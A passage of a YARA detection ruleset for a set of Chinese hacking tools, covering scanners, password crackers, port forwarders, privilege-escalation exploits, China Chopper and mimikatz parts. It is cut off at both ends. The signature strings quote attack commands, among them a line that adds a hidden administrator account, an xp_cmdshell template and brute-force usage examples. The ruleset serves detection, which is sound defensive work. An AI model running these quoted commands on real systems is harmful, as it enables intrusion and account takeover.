    $s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" ascii fullword
    $s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii
    $s7 = "[-] There is a error...Create a new connection." ascii fullword
    $s8 = "[+] Accept a Client on port %d from %s" ascii fullword
    $s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" ascii fullword
    $s13 = "[+] Make a Connection to %s:%d...." ascii fullword
    $s16 = "-listen <ConnectPort> <TransmitPort>" ascii fullword
    $s17 = "[+] Waiting another Client on port:%d...." ascii fullword
    $s18 = "[+] Accept a Client on port %d from %s ......" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 2 of them
}

rule x_way2_5_X_way {
  meta:
    description = "Chinese Hacktool Set - file X-way.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "8ba8530fbda3e8342e8d4feabbf98c66a322dac6"
  strings:
    $s0 = "TTFTPSERVERFRM" wide fullword
    $s1 = "TPORTSCANSETFRM" wide fullword
    $s2 = "TIISSHELLFRM" wide fullword
    $s3 = "TADVSCANSETFRM" wide fullword
    $s4 = "ntwdblib.dll" ascii fullword
    $s5 = "TSNIFFERFRM" wide fullword
    $s6 = "TCRACKSETFRM" wide fullword
    $s7 = "TCRACKFRM" wide fullword
    $s8 = "dbnextrow" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and 5 of them
}

rule tools_Sqlcmd {
  meta:
    description = "Chinese Hacktool Set - file Sqlcmd.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "99d56476e539750c599f76391d717c51c4955a33"
  strings:
    $s0 = "[Usage]:  %s <HostName|IP> <UserName> <Password>" ascii fullword
    $s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" ascii fullword
    $s4 = "Cool! Connected to SQL server on %s successfully!" ascii fullword
    $s5 = "EXEC master..xp_cmdshell \"%s\"" ascii fullword
    $s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" ascii fullword
    $s10 = "Error,exit!" ascii fullword
    $s11 = "Sqlcmd>" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 40960 and 3 of them
}

rule Sword1_5 {
  meta:
    description = "Chinese Hacktool Set - file Sword1.5.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
  strings:
    $s3 = "http://www.ip138.com/ip2city.asp" wide fullword
    $s4 = "http://www.md5decrypter.co.uk/feed/api.aspx?" wide fullword
    $s6 = "ListBox_Command" wide fullword
    $s13 = "md=7fef6171469e80d32c0559f88b377245&submit=MD5+Crack" wide fullword
    $s18 = "\\Set.ini" wide fullword
    $s19 = "OpenFileDialog1" wide fullword
    $s20 = " (*.txt)|*.txt" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 409600 and 4 of them
}

rule Tools_scan {
  meta:
    description = "Chinese Hacktool Set - file scan.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "c580a0cc41997e840d2c0f83962e7f8b636a5a13"
  strings:
    $s2 = "Shanlu Studio" wide fullword
    $s3 = "_AutoAttackMain" ascii fullword
    $s4 = "_frmIpToAddr" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 3072000 and all of them
}

rule Dos_c {
  meta:
    description = "Chinese Hacktool Set - file c.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "3deb6bd52fdac6d5a3e9a91c585d67820ab4df78"
  strings:
    $s0 = "!Win32 .EXE." ascii fullword
    $s1 = ".MPRESS1" ascii fullword
    $s2 = ".MPRESS2" ascii fullword
    $s3 = "XOLEHLP.dll" ascii fullword
    $s4 = "</body></html>" ascii fullword
    $s8 = "DtcGetTransactionManagerExA" ascii fullword
    $s9 = "GetUserNameA" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and all of them
}

rule arpsniffer {
  meta:
    description = "Chinese Hacktool Set - file arpsniffer.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "7d8753f56fc48413fc68102cff34b6583cb0066c"
  strings:
    $s1 = "SHELL" ascii
    $s2 = "PacketSendPacket" ascii fullword
    $s3 = "ArpSniff" ascii
    $s4 = "pcap_loop" ascii fullword
    $s5 = "packet.dll" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 122880 and all of them
}

rule pw_inspector_2 {
  meta:
    description = "Chinese Hacktool Set - file pw-inspector.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "e0a1117ee4a29bb4cf43e3a80fb9eaa63bb377bf"
  strings:
    $s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." ascii fullword
    $s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii
    $s3 = "PW-Inspector" ascii fullword
    $s4 = "i:o:m:M:c:lunps" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 2 of them
}

rule datPcShare {
  meta:
    description = "Chinese Hacktool Set - file datPcShare.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "87acb649ab0d33c62e27ea83241caa43144fc1c4"
  strings:
    $s1 = "PcShare.EXE" wide fullword
    $s2 = "MZKERNEL32.DLL" ascii fullword
    $s3 = "PcShare" wide fullword
    $s4 = "QQ:4564405" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and all of them
}

rule Tools_xport {
  meta:
    description = "Chinese Hacktool Set - file xport.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "9584de562e7f8185f721e94ee3cceac60db26dda"
  strings:
    $s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" ascii fullword
    $s2 = "Example: xport www.xxx.com 80 -m syn" ascii fullword
    $s3 = "%s - command line port scanner" ascii fullword
    $s4 = "xport 192.168.1.1 1-1024 -t 200 -v" ascii fullword
    $s5 = "Usage: xport <Host> <Ports Scope> [Options]" ascii fullword
    $s6 = ".\\port.ini" ascii fullword
    $s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." ascii fullword
    $s8 = "Code by glacier <glacier@xfocus.org>" ascii fullword
    $s9 = "http://www.xfocus.org" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 2 of them
}

rule Pc_xai {
  meta:
    description = "Chinese Hacktool Set - file xai.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "f285a59fd931ce137c08bd1f0dae858cc2486491"
  strings:
    $s1 = "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008  http://www.xcodez.com/" wide fullword
    $s2 = "%SystemRoot%\\System32\\" ascii fullword
    $s3 = "%APPDATA%\\" ascii fullword
    $s4 = "---- C.Rufus Security Team ----" wide fullword
    $s5 = "www.snzzkz.com" wide fullword
    $s6 = "%CommonProgramFiles%\\" ascii fullword
    $s7 = "GetRand.dll" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 3072000 and all of them
}

rule Radmin_Hash {
  meta:
    description = "Chinese Hacktool Set - file Radmin_Hash.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "be407bd5bf5bcd51d38d1308e17a1731cd52f66b"
  strings:
    $s1 = "<description>IEBars</description>" ascii fullword
    $s2 = "PECompact2" ascii fullword
    $s3 = "Radmin, Remote Administrator" wide fullword
    $s4 = "Radmin 3.0 Hash " wide fullword
    $s5 = "HASH1.0" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 614400 and all of them
}

rule OSEditor {
  meta:
    description = "Chinese Hacktool Set - file OSEditor.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "6773c3c6575cf9cfedbb772f3476bb999d09403d"
  strings:
    $s1 = "OSEditor.exe" wide fullword
    $s2 = "netsafe" wide
    $s3 = "OSC Editor" wide fullword
    $s4 = "GIF89" ascii
    $s5 = "Unlock" ascii
  condition:
    uint16(0) == 23117 and filesize < 102400 and all of them
}

rule GoodToolset_ms11011 {
  meta:
    description = "Chinese Hacktool Set - file ms11011.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
  strings:
    $s0 = "\\i386\\Hello.pdb" ascii
    $s1 = "OS not supported." ascii fullword
    $s3 = "Not supported." wide fullword
    $s4 = "SystemDefaultEUDCFont" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and all of them
}

rule FreeVersion_release {
  meta:
    description = "Chinese Hacktool Set - file release.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "f42e4b5748e92f7a450eb49fc89d6859f4afcebb"
  strings:
    $s1 = "-->Got WMI process Pid: %d " ascii
    $s2 = "This exploit will execute \"net user " ascii
    $s3 = "net user temp 123456 /add & net localgroup administrators temp /add" ascii fullword
    $s4 = "Running reverse shell" ascii
    $s5 = "wmiprvse.exe" ascii fullword
    $s6 = "SELECT * FROM IIsWebInfo" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 3 of them
}

rule churrasco {
  meta:
    description = "Chinese Hacktool Set - file churrasco.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "a8d4c177948a8e60d63de9d0ed948c50d0151364"
  strings:
    $s1 = "Done, command should have ran as SYSTEM!" ascii
    $s2 = "Running command with SYSTEM Token..." ascii
    $s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii
    $s4 = "Found SYSTEM token 0x%x" ascii
    $s5 = "Thread not impersonating, looking for another thread..." ascii
  condition:
    uint16(0) == 23117 and filesize < 153600 and 2 of them
}

rule x64_KiwiCmd {
  meta:
    description = "Chinese Hacktool Set - file KiwiCmd.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
  strings:
    $s1 = "Process Ok, Memory Ok, resuming process :)" wide fullword
    $s2 = "Kiwi Cmd no-gpo" wide fullword
    $s3 = "KiwiAndCMD" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 409600 and 2 of them
}

rule sql1433_SQL {
  meta:
    description = "Chinese Hacktool Set - file SQL.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "025e87deadd1c50b1021c26cb67b76b476fafd64"
  strings:
    $s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 }
    $s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 }
  condition:
    uint16(0) == 23117 and filesize < 92160 and all of them
}

rule CookieTools2 {
  meta:
    description = "Chinese Hacktool Set - file CookieTools2.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "cb67797f229fdb92360319e01277e1345305eb82"
  strings:
    $s1 = "www.gxgl.com&www.gxgl.net" wide fullword
    $s2 = "ip.asp?IP=" ascii fullword
    $s3 = "MSIE 5.5;" ascii fullword
    $s4 = "SOFTWARE\\Borland\\" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 716800 and all of them
}

rule cyclotron {
  meta:
    description = "Chinese Hacktool Set - file cyclotron.sys"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "5b63473b6dc1e5942bf07c52c31ba28f2702b246"
  strings:
    $s1 = "\\Device\\IDTProt" wide fullword
    $s2 = "IoDeleteSymbolicLink" ascii fullword
    $s3 = "\\??\\slIDTProt" wide fullword
    $s4 = "IoDeleteDevice" ascii fullword
    $s5 = "IoCreateSymbolicLink" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 3072 and all of them
}

rule xscan_gui {
  meta:
    description = "Chinese Hacktool Set - file xscan_gui.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "a9e900510396192eb2ba4fb7b0ef786513f9b5ab"
  strings:
    $s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" ascii fullword
    $s2 = "www.target.com" ascii fullword
    $s3 = "%s\\scripts\\desc\\%s.desc" ascii fullword
    $s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii
  condition:
    uint16(0) == 23117 and filesize < 3072000 and all of them
}

rule CN_Tools_hscan {
  meta:
    description = "Chinese Hacktool Set - file hscan.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
  strings:
    $s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" ascii fullword
    $s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" ascii fullword
    $s3 = "%s -h www.target.com -all" ascii fullword
    $s4 = ".\\report\\%s-%s.html" ascii fullword
    $s5 = ".\\log\\Hscan.log" ascii fullword
    $s6 = "[%s]: Found cisco Enable password: %s !!!" ascii fullword
    $s7 = "%s@ftpscan#FTP Account:  %s/[null]" ascii fullword
    $s8 = ".\\conf\\mysql_pass.dic" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and all of them
}

rule GoodToolset_pr {
  meta:
    description = "Chinese Hacktool Set - file pr.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "f6676daf3292cff59ef15ed109c2d408369e8ac8"
  strings:
    $s1 = "-->Got WMI process Pid: %d " ascii
    $s2 = "-->This exploit gives you a Local System shell " ascii
    $s3 = "wmiprvse.exe" ascii fullword
    $s4 = "Try the first %d time" ascii fullword
    $s5 = "-->Build&&Change By p " ascii
    $s6 = "root\\MicrosoftIISv2" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and all of them
}

rule hydra_7_4_1_hydra {
  meta:
    description = "Chinese Hacktool Set - file hydra.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "3411d0380a1c1ebf58a454765f94d4f1dd714b5b"
  strings:
    $s1 = "%d of %d target%s%scompleted, %lu valid password%s found" ascii fullword
    $s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" ascii fullword
    $s3 = "hydra -P pass.txt target cisco-enable  (direct console access)" ascii fullword
    $s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" ascii fullword
    $s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" ascii fullword
    $s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and 2 of them
}

rule CN_Tools_srss_2 {
  meta:
    description = "Chinese Hacktool Set - file srss.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "c418b30d004051bbf1b2d3be426936b95b5fea6f"
  strings:
    $x1 = "used pepack!" ascii fullword
    $s1 = "KERNEL32.dll" ascii fullword
    $s2 = "KERNEL32.DLL" ascii fullword
    $s3 = "LoadLibraryA" ascii fullword
    $s4 = "GetProcAddress" ascii fullword
    $s5 = "VirtualProtect" ascii fullword
    $s6 = "VirtualAlloc" ascii fullword
    $s7 = "VirtualFree" ascii fullword
    $s8 = "ExitProcess" ascii fullword
  condition:
    uint16(0) == 23117 and ($x1 at 0) and filesize < 14336 and all of ($s*)
}

rule Dos_NtGod {
  meta:
    description = "Chinese Hacktool Set - file NtGod.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "adefd901d6bbd8437116f0170b9c28a76d4a87bf"
  strings:
    $s0 = "\\temp\\NtGodMode.exe" ascii
    $s4 = "NtGodMode.exe" ascii fullword
    $s10 = "ntgod.bat" ascii fullword
    $s19 = "sfxcmd" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 256000 and all of them
}

rule CN_Tools_VNCLink {
  meta:
    description = "Chinese Hacktool Set - file VNCLink.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "cafb531822cbc0cfebbea864489eebba48081aa1"
  strings:
    $s1 = "C:\\temp\\vncviewer4.log" ascii fullword
    $s2 = "[BL4CK] Patched by redsand || http://blacksecurity.org" ascii fullword
    $s3 = "fake release extendedVkey 0x%x, keysym 0x%x" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 593920 and 2 of them
}

rule tools_NTCmd {
  meta:
    description = "Chinese Hacktool Set - file NTCmd.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "a3ae8659b9a673aa346a60844208b371f7c05e3c"
  strings:
    $s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" ascii fullword
    $s2 = "[Usage]:  %s <HostName|IP> <Username> <Password>" ascii fullword
    $s3 = "pipecmd \\\\%s -U:%s -P:%s %s" ascii fullword
    $s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" ascii fullword
    $s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" ascii fullword
    $s6 = "NTcmd>" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 81920 and 2 of them
}

rule mysql_pwd_crack {
  meta:
    description = "Chinese Hacktool Set - file mysql_pwd_crack.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "57d1cb4d404688804a8c3755b464a6e6248d1c73"
  strings:
    $s1 = "mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt" ascii fullword
    $s2 = "Successfully --> username %s password %s " ascii fullword
    $s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" ascii fullword
    $s4 = "-a automode  automatic crack the mysql password " ascii fullword
    $s5 = "mysql_pwd_crack 127.0.0.1 -x 3306 -a" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 1 of them
}

rule CmdShell64 {
  meta:
    description = "Chinese Hacktool Set - file CmdShell64.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "5b92510475d95ae5e7cd6ec4c89852e8af34acf1"
  strings:
    $s1 = "C:\\Windows\\System32\\JAVASYS.EXE" wide fullword
    $s2 = "ServiceCmdShell" ascii fullword
    $s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii
    $s4 = "ServiceSystemShell" wide fullword
    $s5 = "[Root@CmdShell ~]#" wide fullword
    $s6 = "Hello Man 2015 !" wide fullword
    $s7 = "CmdShell" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 30720 and 4 of them
}

rule Ms_Viru_v {
  meta:
    description = "Chinese Hacktool Set - file v.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "ecf4ba6d1344f2f3114d52859addee8b0770ed0d"
  strings:
    $s1 = "c:\\windows\\system32\\command.com /c " ascii fullword
    $s2 = "Easy Usage Version -- Edited By: racle@tian6.com" ascii fullword
    $s3 = "OH,Sry.Too long command." ascii fullword
    $s4 = "Success! Commander." ascii fullword
    $s5 = "Hey,how can racle work without ur command ?" ascii fullword
    $s6 = "The exploit thread was unable to map the virtual 8086 address space" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 3 of them
}

rule CN_Tools_Vscan {
  meta:
    description = "Chinese Hacktool Set - file Vscan.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "0365fe05e2de0f327dfaa8cd0d988dbb7b379612"
  strings:
    $s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" ascii fullword
    $s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" ascii fullword
    $s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" ascii fullword
    $s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." ascii fullword
    $s5 = "-vn:%-15s:%-7d  connection closed" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 61440 and 2 of them
}

rule Dos_iis {
  meta:
    description = "Chinese Hacktool Set - file iis.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "61ffd2cbec5462766c6f1c44bd44eeaed4f3d2c7"
  strings:
    $s1 = "comspec" ascii fullword
    $s2 = "program terming" ascii fullword
    $s3 = "WinSta0\\Defau" ascii fullword
    $s4 = "* FROM IIsWebInfo" ascii
    $s5 = "www.icehack." ascii
    $s6 = "wmiprvse.exe" ascii fullword
    $s7 = "Pid: %d" ascii
  condition:
    uint16(0) == 23117 and filesize < 71680 and all of them
}

rule IISPutScannesr {
  meta:
    description = "Chinese Hacktool Set - file IISPutScannesr.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "2dd8fee20df47fd4eed5a354817ce837752f6ae9"
  strings:
    $s1 = "yoda & M.o.D." ascii
    $s2 = "-> come.to/f2f **************" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and all of them
}

rule Generate {
  meta:
    description = "Chinese Hacktool Set - file Generate.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
  strings:
    $s1 = "C:\\TEMP\\" ascii fullword
    $s2 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
    $s3 = "$530 Please login with USER and PASS." ascii fullword
    $s4 = "_Shell.exe" ascii fullword
    $s5 = "ftpcWaitingPassword" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 2048000 and 3 of them
}

rule Pc_rejoice {
  meta:
    description = "Chinese Hacktool Set - file rejoice.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
  strings:
    $s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" ascii fullword
    $s2 = "http://www.xxx.com/xxx.exe" ascii fullword
    $s3 = "@ddns.oray.com/ph/update?hostname=" ascii fullword
    $s4 = "No data to read.$Can not bind in port range (%d - %d)" wide fullword
    $s5 = "ListViewProcessListColumnClick!" ascii fullword
    $s6 = "http://iframe.ip138.com/ic.asp" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 3072000 and 3 of them
}

rule ms11080_withcmd {
  meta:
    description = "Chinese Hacktool Set - file ms11080_withcmd.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "745e5058acff27b09cfd6169caf6e45097881a49"
  strings:
    $s1 = "Usage : ms11-080.exe cmd.exe Command " ascii fullword
    $s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" ascii fullword
    $s3 = "[>] by:Mer4en7y@90sec.org" ascii fullword
    $s4 = "[>] create porcess error" ascii fullword
    $s5 = "[>] ms11-080 Exploit" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and 1 of them
}

rule OtherTools_xiaoa {
  meta:
    description = "Chinese Hacktool Set - file xiaoa.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "6988acb738e78d582e3614f83993628cf92ae26d"
  strings:
    $s1 = "Usage:system_exp.exe \"cmd\"" ascii fullword
    $s2 = "The shell \"cmd\" success!" ascii fullword
    $s3 = "Not Windows NT family OS." ascii fullword
    $s4 = "Unable to get kernel base address." ascii fullword
    $s5 = "run \"%s\" failed,code: %d" ascii fullword
    $s6 = "Windows Kernel Local Privilege Exploit " ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and 2 of them
}

rule unknown2 {
  meta:
    description = "Chinese Hacktool Set - file unknown2.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "32508d75c3d95e045ddc82cb829281a288bd5aa3"
  strings:
    $s1 = "http://md5.com.cn/index.php/md5reverse/index/md/" wide fullword
    $s2 = "http://www.md5decrypter.co.uk/feed/api.aspx?" wide fullword
    $s3 = "http://www.md5.com.cn" wide fullword
    $s4 = "1.5.exe" wide fullword
    $s5 = "\\Set.ini" wide fullword
    $s6 = "OpenFileDialog1" wide fullword
    $s7 = " (*.txt)|*.txt" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and 4 of them
}

rule hydra_7_3_hydra {
  meta:
    description = "Chinese Hacktool Set - file hydra.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "2f82b8bf1159e43427880d70bcd116dc9e8026ad"
  strings:
    $s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" ascii fullword
    $s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii
    $s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" ascii fullword
    $s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" ascii fullword
    $s5 = "hydra -P pass.txt target cisco-enable  (direct console access)" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 716800 and 1 of them
}

rule OracleScan {
  meta:
    description = "Chinese Hacktool Set - file OracleScan.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "10ff7faf72fe6da8f05526367b3522a2408999ec"
  strings:
    $s1 = "MYBLOG:HTTP://HI.BAIDU.COM/0X24Q" ascii fullword
    $s2 = "\\Borland\\Delphi\\RTL" ascii fullword
    $s3 = "USER_NAME" ascii
    $s4 = "FROMWWHERE" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and all of them
}

rule SQLTools {
  meta:
    description = "Chinese Hacktool Set - file SQLTools.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "38a9caa2079afa2c8d7327e7762f7ed9a69056f7"
  strings:
    $s1 = "DBN_POST" wide fullword
    $s2 = "LOADER ERROR" ascii fullword
    $s3 = "www.1285.net" wide fullword
    $s4 = "TUPFILEFORM" wide fullword
    $s5 = "DBN_DELETE" wide fullword
    $s6 = "DBINSERT" wide fullword
    $s7 = "Copyright (C) Kibosoft Corp. 2001-2006" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 2406400 and all of them
}

rule portscanner {
  meta:
    description = "Chinese Hacktool Set - file portscanner.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "1de367d503fdaaeee30e8ad7c100dd1e320858a4"
  strings:
    $s0 = "PortListfNo" ascii fullword
    $s1 = ".533.net" ascii fullword
    $s2 = "CRTDLL.DLL" ascii fullword
    $s3 = "exitfc" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 25600 and all of them
}

rule kappfree {
  meta:
    description = "Chinese Hacktool Set - file kappfree.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "e57e79f190f8a24ca911e6c7e008743480c08553"
  strings:
    $s1 = "Bienvenue dans un processus distant" wide fullword
    $s2 = "kappfree.dll" ascii fullword
    $s3 = "kappfree de mimikatz pour Windows (anti AppLocker)" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and all of them
}

rule Smartniff {
  meta:
    description = "Chinese Hacktool Set - file Smartniff.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "67609f21d54a57955d8fe6d48bc471f328748d0a"
  strings:
    $s1 = "smsniff.exe" wide fullword
    $s2 = "support@nirsoft.net0" ascii fullword
    $s3 = "</requestedPrivileges></security></trustInfo></assembly>" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and all of them
}

rule ChinaChopper_caidao {
  meta:
    description = "Chinese Hacktool Set - file caidao.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "056a60ec1f6a8959bfc43254d97527b003ae5edb"
  strings:
    $s1 = "Pass,Config,n{)" ascii fullword
    $s2 = "phMYSQLZ" ascii fullword
    $s3 = "\\DHLP\\." ascii fullword
    $s4 = "\\dhlp\\." ascii fullword
    $s5 = "SHAutoComple" ascii fullword
    $s6 = "MainFrame" ascii
  condition:
    uint16(0) == 23117 and filesize < 1102848 and all of them
}

rule KiwiTaskmgr_2 {
  meta:
    description = "Chinese Hacktool Set - file KiwiTaskmgr.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
  strings:
    $s1 = "Process Ok, Memory Ok, resuming process :)" wide fullword
    $s2 = "Kiwi Taskmgr no-gpo" wide fullword
    $s3 = "KiwiAndTaskMgr" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and all of them
}

rule kappfree_2 {
  meta:
    description = "Chinese Hacktool Set - file kappfree.dll"
